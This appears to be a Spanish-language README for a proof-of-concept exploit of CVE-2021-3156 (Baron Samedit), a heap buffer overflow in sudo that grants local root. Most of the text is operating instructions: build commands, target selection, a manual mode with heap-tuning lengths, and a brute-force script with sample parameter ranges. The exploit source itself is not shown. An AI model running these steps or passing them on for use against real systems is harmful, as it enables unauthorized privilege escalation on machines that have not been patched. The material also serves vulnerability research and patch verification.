
Exploit de prueba de concepto para CVE-2021-3156, un desbordamiento de búfer basado en heap en sudo (Baron Samedit). Proporciona selección de objetivo, ajuste manual de parámetros y detección experimental por fuerza bruta para escalada de privilegios.
Este es un exploit para la vulnerabilidad CVE-2021-3156 en sudo (apodada Baron Samedit by Qualys).
Compilar:
$ make
lista de objetivos:
$ ./sudo-hax-me-a-sandwich
Ejecutar:
$ ./sudo-hax-me-a-sandwich <target_number>
modo manual:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
Asegúrate de tener GNU parallel instalado.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
algunos patrones para probar:
$ ./brute.sh 90 120 50 70 150 300
Consumirá todos los núcleos disponibles. No intentes hacer netflix & brute.
Contribuye al repositorio Envía PR (sensato), puedo fusionar. Dejen una estrella
Algunas ideas: